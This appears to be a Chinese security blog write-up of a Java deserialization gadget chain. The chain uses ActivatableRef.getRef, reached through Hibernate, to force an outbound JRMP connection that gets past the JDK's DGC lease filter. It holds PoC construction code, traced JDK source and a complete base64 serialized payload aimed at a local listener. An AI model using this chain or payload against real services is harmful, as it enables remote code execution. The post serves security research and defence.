一次遗憾的java反序列化挖掘

免责声明:

本文章内容仅供教育和学习使用,不得用于非法或有害目的。请在合法范围内应用网络安全知识,对任何因使用本文内容造成的损失,文章作者不承担责任。
文章作者博客地址为https://n1ght.cn/

正文

jdk版本(目前测试):11.0.29,1.8.0_441

1
2
3
4
5
6
7
8
9
10
11
String host = "127.0.0.1";
int    port = 13999;
ObjID id2  = new ObjID(new Random().nextInt()); // RMI registry
TCPEndpoint te  = new TCPEndpoint(host, port);
UnicastRef ref = new UnicastRef(new LiveRef(id2, te, false));
RemoteObjectInvocationHandler handler = new RemoteObjectInvocationHandler(ref);
Object proxy = Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(), new Class[]{Remote.class, Activator.class}, handler);
ActivationID activationID = new ActivationID((Activator) proxy);
ActivatableRef activatableRef =(ActivatableRef) utils.createWithoutConstructor("sun.rmi.server.ActivatableRef");
setFieldValue(activatableRef, "id", activationID);
Method method = ActivatableRef.class.getDeclaredMethod("getRef");

activatableRef调用getRef的时候,会触发jrmp反序列化

但是可惜,他是private方法,不像我们之前常用的TemplatesImpl,他的方法是public

所以我们无法去用jackson和fastjson去触发,在由于因为cb链子需要getPropertyBean,我们的ref是null值会触发空指针异常报错,rome链也是同理使用不了,所以说是一次遗憾的java反序列化挖掘,但是hibernate2反序列化,他什么都能调用,所以也就强行把这个链子接上了,故有了这篇文章

1
2
3
4
5
6
7
8
9
10
private synchronized RemoteRef getRef()
    throws RemoteException
{
    if (ref == null) {
        ref = activate(false);
    }

    return ref;
}

UnicastRef反序列化为什么不行

走进UnicastRef​的readExternal会触发

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
    public static LiveRef read(ObjectInput var0, boolean var1) throws IOException, ClassNotFoundException {
        TCPEndpoint var2;
        if (var1) {
            var2 = TCPEndpoint.read(var0);
        } else {
            var2 = TCPEndpoint.readHostPortFormat(var0);
        }

        ObjID var3 = ObjID.read(var0);
        boolean var4 = var0.readBoolean();
        LiveRef var5 = new LiveRef(var3, var2, false);
        if (var0 instanceof ConnectionInputStream) {
            ConnectionInputStream var6 = (ConnectionInputStream)var0;
            var6.saveRef(var5);
            if (var4) {
                var6.setAckNeeded();
            }
        } else {
            DGCClient.registerRefs(var2, Arrays.asList(var5));
        }

        return var5;
    }
//触发
    static void registerRefs(Endpoint var0, List<LiveRef> var1) {
        EndpointEntry var2;
        do {
            var2 = DGCClient.EndpointEntry.lookup(var0);
        } while(!var2.registerRefs(var1));

    }
//触发
    public boolean registerRefs(List<LiveRef> var1) {
            assert !Thread.holdsLock(this);

            HashSet var2 = null;
            long var3;
            synchronized(this) {
                if (this.removed) {
                    return false;
                }

                for(LiveRef var7 : var1) {
                    assert var7.getEndpoint().equals(this.endpoint);

                    RefEntry var8 = (RefEntry)this.refTable.get(var7);
                    if (var8 == null) {
                        LiveRef var9 = (LiveRef)var7.clone();
                        var8 = new RefEntry(var9);
                        this.refTable.put(var9, var8);
                        if (var2 == null) {
                            var2 = new HashSet(5);
                        }

                        var2.add(var8);
                    }

                    var8.addInstanceToRefSet(var7);
                }

                if (var2 == null) {
                    return true;
                }

                var2.addAll(this.invalidRefs);
                this.invalidRefs.clear();
                var3 = DGCClient.getNextSequenceNum();
            }

            this.makeDirtyCall(var2, var3);
            return true;
        }
//触发
        private void makeDirtyCall(Set<RefEntry> var1, long var2) {
            assert !Thread.holdsLock(this);

            ObjID[] var4;
            if (var1 != null) {
                var4 = createObjIDArray(var1);
            } else {
                var4 = DGCClient.emptyObjIDArray;
            }

            long var5 = System.currentTimeMillis();

            try {
                Lease var20 = this.dgc.dirty(var4, var2, new Lease(DGCClient.vmid, DGCClient.leaseValue));
.......
		}
//触发
    public Lease dirty(ObjID[] var1, long var2, Lease var4) throws RemoteException {
        try {
            StreamRemoteCall var5 = (StreamRemoteCall)this.ref.newCall(this, operations, 1, -669196253586618813L);
            var5.setObjectInputFilter(DGCImpl_Stub::leaseFilter);

            try {
                ObjectOutput var6 = var5.getOutputStream();
                var6.writeObject(var1);
                var6.writeLong(var2);
                var6.writeObject(var4);
            } catch (IOException var16) {
                throw new MarshalException("error marshalling arguments", var16);
            }

            this.ref.invoke(var5);
            Connection var7 = var5.getConnection();

            Lease var22;
            try {
                ObjectInput var8 = var5.getInputStream();
                var22 = (Lease)var8.readObject();
            } catch (IOException | ClassNotFoundException | ClassCastException var17) {
                if (var7 instanceof TCPConnection) {
                    ((TCPConnection)var7).getChannel().free(var7, false);
                }

                var5.discardPendingRefs();
                throw new UnmarshalException("error unmarshalling return", var17);
            } finally {
                this.ref.done(var5);
            }

            return var22;
        } catch (RuntimeException var19) {
            throw var19;
        } catch (RemoteException var20) {
            throw var20;
        } catch (Exception var21) {
            throw new UnexpectedException("undeclared checked exception", var21);
        }
    }

其中var5.setObjectInputFilter(DGCImpl_Stub::leaseFilter);这一行就是对DGC垃圾回收的限制

从而触发了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
private static ObjectInputFilter.Status leaseFilter(ObjectInputFilter.FilterInfo var0) {
    if (var0.depth() > (long)DGCCLIENT_MAX_DEPTH) {
        return Status.REJECTED;
    } else {
        Class var1 = var0.serialClass();
        if (var1 == null) {
            return Status.UNDECIDED;
        } else {
            while(var1.isArray()) {
                if (var0.arrayLength() >= 0L && var0.arrayLength() > (long)DGCCLIENT_MAX_ARRAY_SIZE) {
                    return Status.REJECTED;
                }

                var1 = var1.getComponentType();
            }

            if (var1.isPrimitive()) {
                return Status.ALLOWED;
            } else {
                return var1 != UID.class && var1 != VMID.class && var1 != Lease.class && (var1.getPackage() == null || !Throwable.class.isAssignableFrom(var1) || !"java.lang".equals(var1.getPackage().getName()) && !"java.rmi".equals(var1.getPackage().getName())) && var1 != StackTraceElement.class && var1 != ArrayList.class && var1 != Object.class && !var1.getName().equals("java.util.Collections$UnmodifiableList") && !var1.getName().equals("java.util.Collections$UnmodifiableCollection") && !var1.getName().equals("java.util.Collections$UnmodifiableRandomAccessList") && !var1.getName().equals("java.util.Collections$EmptyList") ? Status.REJECTED : Status.ALLOWED;
            }
        }
    }
}

如何绕过

而我们这个sink,没有var5.setObjectInputFilter(DGCImpl_Stub::leaseFilter);这个行为

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
    private synchronized RemoteRef getRef() throws RemoteException {
        if (this.ref == null) {
            this.ref = this.activate(false);
        }

        return this.ref;
    }
//触发
    private RemoteRef activate(boolean var1) throws RemoteException {
        assert Thread.holdsLock(this);

        this.ref = null;

        try {
            Remote var2 = this.id.activate(var1);
            ActivatableRef var3 = null;
            if (var2 instanceof RemoteStub) {
                var3 = (ActivatableRef)((RemoteStub)var2).getRef();
            } else {
                RemoteObjectInvocationHandler var4 = (RemoteObjectInvocationHandler)Proxy.getInvocationHandler(var2);
                var3 = (ActivatableRef)var4.getRef();
            }

            this.ref = var3.ref;
            return this.ref;
        } catch (ConnectException var5) {
            throw new ConnectException("activation failed", var5);
        } catch (RemoteException var6) {
            throw new ConnectIOException("activation failed", var6);
        } catch (UnknownObjectException var7) {
            throw new NoSuchObjectException("object not registered");
        } catch (ActivationException var8) {
            throw new ActivateFailedException("activation failed", var8);
        }
    }
//触发
    public Remote activate(boolean force)//其中force为false
        throws ActivationException, UnknownObjectException, RemoteException
    {
        try {
            MarshalledObject<? extends Remote> mobj =
                activator.activate(this, force);
            return AccessController.doPrivileged(
                new PrivilegedExceptionAction<Remote>() {
                    public Remote run() throws IOException, ClassNotFoundException {
                        return mobj.get();
                    }
                }, NOPERMS_ACC);
        } catch (PrivilegedActionException pae) {
            Exception ex = pae.getException();
            if (ex instanceof RemoteException) {
                throw (RemoteException) ex;
            } else {
                throw new UnmarshalException("activation failed", ex);
            }
        }

    }
//触发
    public Object invoke(Object proxy, Method method, Object[] args)
        throws Throwable
    {
        if (! Proxy.isProxyClass(proxy.getClass())) {
            throw new IllegalArgumentException("not a proxy");
        }

        if (Proxy.getInvocationHandler(proxy) != this) {
            throw new IllegalArgumentException("handler mismatch");
        }

        if (method.getDeclaringClass() == Object.class) {
            return invokeObjectMethod(proxy, method, args);
        } else if ("finalize".equals(method.getName()) && method.getParameterCount() == 0 &&
            !allowFinalizeInvocation) {
            return null; // ignore
        } else {
            return invokeRemoteMethod(proxy, method, args);
        }
    }
//触发
 private Object invokeRemoteMethod(Object proxy,
                                      Method method,
                                      Object[] args)
        throws Exception
    {
        try {
            if (!(proxy instanceof Remote)) {
                throw new IllegalArgumentException(
                    "proxy not Remote instance");
            }

            // Verify that the method is declared on an interface that extends Remote
            Class<?> decl = method.getDeclaringClass();
            if (!Remote.class.isAssignableFrom(decl)) {
                throw new RemoteException("Method is not Remote: " + decl + "::" + method);
            }

            return ref.invoke((Remote) proxy, method, args,
                              getMethodHash(method));
        } catch (Exception e) {
            if (!(e instanceof RuntimeException)) {
                Class<?> cl = proxy.getClass();
                try {
                    method = cl.getMethod(method.getName(),
                                          method.getParameterTypes());
                } catch (NoSuchMethodException nsme) {
                    throw (IllegalArgumentException)
                        new IllegalArgumentException().initCause(nsme);
                }
                Class<?> thrownType = e.getClass();
                for (Class<?> declaredType : method.getExceptionTypes()) {
                    if (declaredType.isAssignableFrom(thrownType)) {
                        throw e;
                    }
                }
                e = new UnexpectedException("unexpected exception", e);
            }
            throw e;
        }
    }
//触发
 public Object invoke(Remote var1, Method var2, Object[] var3, long var4) throws Exception {
        if (clientRefLog.isLoggable(Log.VERBOSE)) {
            clientRefLog.log(Log.VERBOSE, "method: " + var2);
        }

        if (clientCallLog.isLoggable(Log.VERBOSE)) {
            this.logClientCall(var1, var2);
        }

        Connection var6 = this.ref.getChannel().newConnection();
        Object var7 = null;
        boolean var8 = true;
        boolean var9 = false;

        Object var11;
        try {
            if (clientRefLog.isLoggable(Log.VERBOSE)) {
                clientRefLog.log(Log.VERBOSE, "opnum = " + var4);
            }

            StreamRemoteCall var46 = new StreamRemoteCall(var6, this.ref.getObjID(), -1, var4);

            try {
                ObjectOutput var10 = var46.getOutputStream();
                this.marshalCustomCallData(var10);
                var11 = var2.getParameterTypes();

                for(int var12 = 0; var12 < ((Object[])var11).length; ++var12) {
                    marshalValue((Class)((Object[])var11)[var12], var3[var12], var10);
                }
            } catch (IOException var39) {
                clientRefLog.log(Log.BRIEF, "IOException marshalling arguments: ", var39);
                throw new MarshalException("error marshalling arguments", var39);
            }

            var46.executeCall();
.......
   }

触发executeCall,后触发了readObject

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
public void executeCall() throws Exception {
      DGCAckHandler var2 = null;

      byte var1;
      try {
          if (this.out != null) {
              var2 = this.out.getDGCAckHandler();
          }

          this.releaseOutputStream();
          DataInputStream var3 = new DataInputStream(this.conn.getInputStream());
          byte var4 = var3.readByte();
          if (var4 != 81) {
              if (Transport.transportLog.isLoggable(Log.BRIEF)) {
                  Transport.transportLog.log(Log.BRIEF, "transport return code invalid: " + var4);
              }

              throw new UnmarshalException("Transport return code invalid");
          }

          this.getInputStream();
          var1 = this.in.readByte();
          this.in.readID();
      } catch (UnmarshalException var11) {
          throw var11;
      } catch (IOException var12) {
          throw new UnmarshalException("Error unmarshaling return header", var12);
      } finally {
          if (var2 != null) {
              var2.release();
          }

      }

      switch (var1) {
          case 1:
              return;
          case 2:
              Object var14;
              try {
                  var14 = this.in.readObject();

进行测试

触发日志

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
D:\Code\environment\jdk\jdk1.8.0_441\bin\java.exe "-javaagent:D:\Code\CodeEditor\IntelliJ IDEA 2025.2.2\lib\idea_rt.jar=63980" -Dfile.encoding=UTF-8 -classpath D:\Code\environment\jdk\jdk1.8.0_441\jre\lib\charsets.jar;D:\Code\environment\jdk\jdk1.8.0_441\jre\lib\deploy.jar;D:\Code\environment\jdk\jdk1.8.0_441\jre\lib\ext\access-bridge-64.jar;D:\Code\environment\jdk\jdk1.8.0_441\jre\lib\ext\cldrdata.jar;D:\Code\environment\jdk\jdk1.8.0_441\jre\lib\ext\dnsns.jar;D:\Code\environment\jdk\jdk1.8.0_441\jre\lib\ext\jaccess.jar;D:\Code\environment\jdk\jdk1.8.0_441\jre\lib\ext\jfxrt.jar;D:\Code\environment\jdk\jdk1.8.0_441\jre\lib\ext\localedata.jar;D:\Code\environment\jdk\jdk1.8.0_441\jre\lib\ext\nashorn.jar;D:\Code\environment\jdk\jdk1.8.0_441\jre\lib\ext\sunec.jar;D:\Code\environment\jdk\jdk1.8.0_441\jre\lib\ext\sunjce_provider.jar;D:\Code\environment\jdk\jdk1.8.0_441\jre\lib\ext\sunmscapi.jar;D:\Code\environment\jdk\jdk1.8.0_441\jre\lib\ext\sunpkcs11.jar;D:\Code\environment\jdk\jdk1.8.0_441\jre\lib\ext\zipfs.jar;D:\Code\environment\jdk\jdk1.8.0_441\jre\lib\javaws.jar;D:\Code\environment\jdk\jdk1.8.0_441\jre\lib\jce.jar;D:\Code\environment\jdk\jdk1.8.0_441\jre\lib\jfr.jar;D:\Code\environment\jdk\jdk1.8.0_441\jre\lib\jfxswt.jar;D:\Code\environment\jdk\jdk1.8.0_441\jre\lib\jsse.jar;D:\Code\environment\jdk\jdk1.8.0_441\jre\lib\management-agent.jar;D:\Code\environment\jdk\jdk1.8.0_441\jre\lib\plugin.jar;D:\Code\environment\jdk\jdk1.8.0_441\jre\lib\resources.jar;D:\Code\environment\jdk\jdk1.8.0_441\jre\lib\rt.jar;E:\codeAudit\untitled1\target\classes;C:\Users\night\.m2\repository\org\springframework\boot\spring-boot-starter-web\2.2.3.RELEASE\spring-boot-starter-web-2.2.3.RELEASE.jar;C:\Users\night\.m2\repository\org\springframework\boot\spring-boot-starter\2.2.3.RELEASE\spring-boot-starter-2.2.3.RELEASE.jar;C:\Users\night\.m2\repository\org\springframework\boot\spring-boot\2.2.3.RELEASE\spring-boot-2.2.3.RELEASE.jar;C:\Users\night\.m2\repository\org\springframework\boot\spring-boot-autoconfigure\2.2.3.RELEASE\spring-boot-autoconfigure-2.2.3.RELEASE.jar;C:\Users\night\.m2\repository\org\springframework\boot\spring-boot-starter-logging\2.2.3.RELEASE\spring-boot-starter-logging-2.2.3.RELEASE.jar;C:\Users\night\.m2\repository\ch\qos\logback\logback-classic\1.2.3\logback-classic-1.2.3.jar;C:\Users\night\.m2\repository\ch\qos\logback\logback-core\1.2.3\logback-core-1.2.3.jar;C:\Users\night\.m2\repository\org\slf4j\slf4j-api\1.7.25\slf4j-api-1.7.25.jar;C:\Users\night\.m2\repository\org\apache\logging\log4j\log4j-to-slf4j\2.12.1\log4j-to-slf4j-2.12.1.jar;C:\Users\night\.m2\repository\org\apache\logging\log4j\log4j-api\2.12.1\log4j-api-2.12.1.jar;C:\Users\night\.m2\repository\org\slf4j\jul-to-slf4j\1.7.30\jul-to-slf4j-1.7.30.jar;C:\Users\night\.m2\repository\jakarta\annotation\jakarta.annotation-api\1.3.5\jakarta.annotation-api-1.3.5.jar;C:\Users\night\.m2\repository\org\springframework\spring-core\5.2.3.RELEASE\spring-core-5.2.3.RELEASE.jar;C:\Users\night\.m2\repository\org\springframework\spring-jcl\5.2.3.RELEASE\spring-jcl-5.2.3.RELEASE.jar;C:\Users\night\.m2\repository\org\yaml\snakeyaml\1.25\snakeyaml-1.25.jar;C:\Users\night\.m2\repository\org\springframework\boot\spring-boot-starter-json\2.2.3.RELEASE\spring-boot-starter-json-2.2.3.RELEASE.jar;C:\Users\night\.m2\repository\com\fasterxml\jackson\core\jackson-databind\2.10.2\jackson-databind-2.10.2.jar;C:\Users\night\.m2\repository\com\fasterxml\jackson\core\jackson-annotations\2.10.2\jackson-annotations-2.10.2.jar;C:\Users\night\.m2\repository\com\fasterxml\jackson\core\jackson-core\2.10.2\jackson-core-2.10.2.jar;C:\Users\night\.m2\repository\com\fasterxml\jackson\datatype\jackson-datatype-jdk8\2.10.2\jackson-datatype-jdk8-2.10.2.jar;C:\Users\night\.m2\repository\com\fasterxml\jackson\datatype\jackson-datatype-jsr310\2.10.2\jackson-datatype-jsr310-2.10.2.jar;C:\Users\night\.m2\repository\com\fasterxml\jackson\module\jackson-module-parameter-names\2.10.2\jackson-module-parameter-names-2.10.2.jar;C:\Users\night\.m2\repository\org\springframework\boot\spring-boot-starter-tomcat\2.2.3.RELEASE\spring-boot-starter-tomcat-2.2.3.RELEASE.jar;C:\Users\night\.m2\repository\org\apache\tomcat\embed\tomcat-embed-core\9.0.30\tomcat-embed-core-9.0.30.jar;C:\Users\night\.m2\repository\org\apache\tomcat\embed\tomcat-embed-el\9.0.30\tomcat-embed-el-9.0.30.jar;C:\Users\night\.m2\repository\org\apache\tomcat\embed\tomcat-embed-websocket\9.0.30\tomcat-embed-websocket-9.0.30.jar;C:\Users\night\.m2\repository\org\springframework\boot\spring-boot-starter-validation\2.2.3.RELEASE\spring-boot-starter-validation-2.2.3.RELEASE.jar;C:\Users\night\.m2\repository\jakarta\validation\jakarta.validation-api\2.0.2\jakarta.validation-api-2.0.2.jar;C:\Users\night\.m2\repository\org\hibernate\validator\hibernate-validator\6.0.18.Final\hibernate-validator-6.0.18.Final.jar;C:\Users\night\.m2\repository\org\springframework\spring-web\5.2.3.RELEASE\spring-web-5.2.3.RELEASE.jar;C:\Users\night\.m2\repository\org\springframework\spring-beans\5.2.3.RELEASE\spring-beans-5.2.3.RELEASE.jar;C:\Users\night\.m2\repository\org\springframework\spring-webmvc\5.2.3.RELEASE\spring-webmvc-5.2.3.RELEASE.jar;C:\Users\night\.m2\repository\org\springframework\spring-aop\5.2.3.RELEASE\spring-aop-5.2.3.RELEASE.jar;C:\Users\night\.m2\repository\org\springframework\spring-context\5.2.3.RELEASE\spring-context-5.2.3.RELEASE.jar;C:\Users\night\.m2\repository\org\springframework\spring-expression\5.2.3.RELEASE\spring-expression-5.2.3.RELEASE.jar;C:\Users\night\.m2\repository\org\javassist\javassist\3.28.0-GA\javassist-3.28.0-GA.jar;C:\Users\night\.m2\repository\commons-collections\commons-collections\3.2.1\commons-collections-3.2.1.jar;C:\Users\night\.m2\repository\commons-beanutils\commons-beanutils\1.9.3\commons-beanutils-1.9.3.jar;C:\Users\night\.m2\repository\commons-logging\commons-logging\1.2\commons-logging-1.2.jar;C:\Users\night\.m2\repository\org\hibernate\hibernate-core\5.6.15.Final\hibernate-core-5.6.15.Final.jar;C:\Users\night\.m2\repository\org\jboss\logging\jboss-logging\3.4.3.Final\jboss-logging-3.4.3.Final.jar;C:\Users\night\.m2\repository\javax\persistence\javax.persistence-api\2.2\javax.persistence-api-2.2.jar;C:\Users\night\.m2\repository\net\bytebuddy\byte-buddy\1.12.18\byte-buddy-1.12.18.jar;C:\Users\night\.m2\repository\antlr\antlr\2.7.7\antlr-2.7.7.jar;C:\Users\night\.m2\repository\org\jboss\spec\javax\transaction\jboss-transaction-api_1.2_spec\1.1.1.Final\jboss-transaction-api_1.2_spec-1.1.1.Final.jar;C:\Users\night\.m2\repository\org\jboss\jandex\2.4.2.Final\jandex-2.4.2.Final.jar;C:\Users\night\.m2\repository\com\fasterxml\classmate\1.5.1\classmate-1.5.1.jar;C:\Users\night\.m2\repository\javax\activation\javax.activation-api\1.2.0\javax.activation-api-1.2.0.jar;C:\Users\night\.m2\repository\org\hibernate\common\hibernate-commons-annotations\5.1.2.Final\hibernate-commons-annotations-5.1.2.Final.jar;C:\Users\night\.m2\repository\javax\xml\bind\jaxb-api\2.3.1\jaxb-api-2.3.1.jar;C:\Users\night\.m2\repository\org\glassfish\jaxb\jaxb-runtime\2.3.1\jaxb-runtime-2.3.1.jar;C:\Users\night\.m2\repository\org\glassfish\jaxb\txw2\2.3.1\txw2-2.3.1.jar;C:\Users\night\.m2\repository\com\sun\istack\istack-commons-runtime\3.0.7\istack-commons-runtime-3.0.7.jar;C:\Users\night\.m2\repository\org\jvnet\staxex\stax-ex\1.8\stax-ex-1.8.jar;C:\Users\night\.m2\repository\com\sun\xml\fastinfoset\FastInfoset\1.2.15\FastInfoset-1.2.15.jar;C:\Users\night\.m2\repository\com\caucho\hessian\4.0.66\hessian-4.0.66.jar;C:\Users\night\.m2\repository\rome\rome\1.0\rome-1.0.jar;C:\Users\night\.m2\repository\jdom\jdom\1.0\jdom-1.0.jar org.example.Main
18:16:44.334 [main] DEBUG org.jboss.logging - Logging Provider: org.jboss.logging.Log4j2LoggerProvider
rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IAI29yZy5oaWJlcm5hdGUuZW5naW5lLnNwaS5UeXBlZFZhbHVlh4gUshmh5zwCAAJMAAR0eXBldAAZTG9yZy9oaWJlcm5hdGUvdHlwZS9UeXBlO0wABXZhbHVldAASTGphdmEvbGFuZy9PYmplY3Q7eHBzcgAgb3JnLmhpYmVybmF0ZS50eXBlLkNvbXBvbmVudFR5cGXHO08ZYmxfcgIADVoAHGNyZWF0ZUVtcHR5Q29tcG9zaXRlc0VuYWJsZWRaABJoYXNOb3ROdWxsUHJvcGVydHlaAAVpc0tleUkADHByb3BlcnR5U3BhbkwAD2NhbkRvRXh0cmFjdGlvbnQAE0xqYXZhL2xhbmcvQm9vbGVhbjtbAAdjYXNjYWRldAAoW0xvcmcvaGliZXJuYXRlL2VuZ2luZS9zcGkvQ2FzY2FkZVN0eWxlO0wAEWNvbXBvbmVudFR1cGxpemVydAAxTG9yZy9oaWJlcm5hdGUvdHVwbGUvY29tcG9uZW50L0NvbXBvbmVudFR1cGxpemVyO0wACmVudGl0eU1vZGV0ABpMb3JnL2hpYmVybmF0ZS9FbnRpdHlNb2RlO1sAC2pvaW5lZEZldGNodAAaW0xvcmcvaGliZXJuYXRlL0ZldGNoTW9kZTtbAA1wcm9wZXJ0eU5hbWVzdAATW0xqYXZhL2xhbmcvU3RyaW5nO1sAE3Byb3BlcnR5TnVsbGFiaWxpdHl0AAJbWlsADXByb3BlcnR5VHlwZXN0ABpbTG9yZy9oaWJlcm5hdGUvdHlwZS9UeXBlO1sAIXByb3BlcnR5VmFsdWVHZW5lcmF0aW9uU3RyYXRlZ2llc3QAJltMb3JnL2hpYmVybmF0ZS90dXBsZS9WYWx1ZUdlbmVyYXRpb247eHIAH29yZy5oaWJlcm5hdGUudHlwZS5BYnN0cmFjdFR5cGXJFpSxstQ41AIAAHhwAAAAAAAAAXBwc3IAM29yZy5oaWJlcm5hdGUudHVwbGUuY29tcG9uZW50LlBvam9Db21wb25lbnRUdXBsaXplcsBwOcjTg59YAgAETAAOY29tcG9uZW50Q2xhc3N0ABFMamF2YS9sYW5nL0NsYXNzO0wACW9wdGltaXplcnQAMExvcmcvaGliZXJuYXRlL2J5dGVjb2RlL3NwaS9SZWZsZWN0aW9uT3B0aW1pemVyO0wADHBhcmVudEdldHRlcnQAKkxvcmcvaGliZXJuYXRlL3Byb3BlcnR5L2FjY2Vzcy9zcGkvR2V0dGVyO0wADHBhcmVudFNldHRlcnQAKkxvcmcvaGliZXJuYXRlL3Byb3BlcnR5L2FjY2Vzcy9zcGkvU2V0dGVyO3hyADdvcmcuaGliZXJuYXRlLnR1cGxlLmNvbXBvbmVudC5BYnN0cmFjdENvbXBvbmVudFR1cGxpemVy8vZxKVYnaN0CAAVaABJoYXNDdXN0b21BY2Nlc3NvcnNJAAxwcm9wZXJ0eVNwYW5bAAdnZXR0ZXJzdAArW0xvcmcvaGliZXJuYXRlL3Byb3BlcnR5L2FjY2Vzcy9zcGkvR2V0dGVyO0wADGluc3RhbnRpYXRvcnQAIkxvcmcvaGliZXJuYXRlL3R1cGxlL0luc3RhbnRpYXRvcjtbAAdzZXR0ZXJzdAArW0xvcmcvaGliZXJuYXRlL3Byb3BlcnR5L2FjY2Vzcy9zcGkvU2V0dGVyO3hwAAAAAAB1cgA1W0xvcmcuaGliZXJuYXRlLnByb3BlcnR5LmFjY2Vzcy5zcGkuR2V0dGVyTWV0aG9kSW1wbDu/pSysWxHxpwIAAHhwAAAAAXNyAD1vcmcuaGliZXJuYXRlLnByb3BlcnR5LmFjY2Vzcy5zcGkuR2V0dGVyTWV0aG9kSW1wbCRTZXJpYWxGb3JtrFu2VsndG1gCAARMAA5jb250YWluZXJDbGFzc3EAfgATTAAOZGVjbGFyaW5nQ2xhc3NxAH4AE0wACm1ldGhvZE5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztMAAxwcm9wZXJ0eU5hbWVxAH4AH3hwcHZyAB1zdW4ucm1pLnNlcnZlci5BY3RpdmF0YWJsZVJlZmkuOvZUvgduDAAAeHB0AAZnZXRSZWZwcHBwcHBwcHBwcHVyABpbTG9yZy5oaWJlcm5hdGUudHlwZS5UeXBlO36vq6HklWGaAgAAeHAAAAABcQB+ABFwc3EAfgAhc3IAIGphdmEucm1pLmFjdGl2YXRpb24uQWN0aXZhdGlvbklEwAq0Rj/brq0DAAB4cHNyABNqYXZhLnJtaS5zZXJ2ZXIuVUlEDxJwDb82TxICAANTAAVjb3VudEoABHRpbWVJAAZ1bmlxdWV4cIABAAABmtlqJa5TRK2mdzIAClVuaWNhc3RSZWYACTEyNy4wLjAuMQAANq8AAAAAW5eMuQAAAAAAAAAAAAAAAAAAAHh3AgAAeHQAA3h4eHg=
十二月 01, 2025 6:16:44 下午 java.io.ObjectInputStream filterCheck
信息: ObjectInputFilter REJECTED: class javax.naming.NamingException, array length: -1, nRefs: 2, depth: 1, bytes: 198, ex: n/a
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.BooleanConverter - Setting default value: false
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.BooleanConverter - Converting 'Boolean' value 'false' to type 'Boolean'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.BooleanConverter -     No conversion required, value is already a Boolean
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ByteConverter - Setting default value: 0
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ByteConverter - Converting 'Integer' value '0' to type 'Byte'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ByteConverter -     Converted to Byte value '0'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.CharacterConverter - Setting default value:  
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.CharacterConverter - Converting 'Character' value ' ' to type 'Character'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.CharacterConverter -     No conversion required, value is already a Character
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.DoubleConverter - Setting default value: 0
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.DoubleConverter - Converting 'Integer' value '0' to type 'Double'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.DoubleConverter -     Converted to Double value '0.0'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.FloatConverter - Setting default value: 0
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.FloatConverter - Converting 'Integer' value '0' to type 'Float'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.FloatConverter -     Converted to Float value '0.0'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.IntegerConverter - Setting default value: 0
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.IntegerConverter - Converting 'Integer' value '0' to type 'Integer'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.IntegerConverter -     No conversion required, value is already a Integer
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.LongConverter - Setting default value: 0
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.LongConverter - Converting 'Integer' value '0' to type 'Long'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.LongConverter -     Converted to Long value '0'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ShortConverter - Setting default value: 0
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ShortConverter - Converting 'Integer' value '0' to type 'Short'
18:16:44.446 [main] DEBUG org.apache.commons.beanutils.converters.ShortConverter -     Converted to Short value '0'
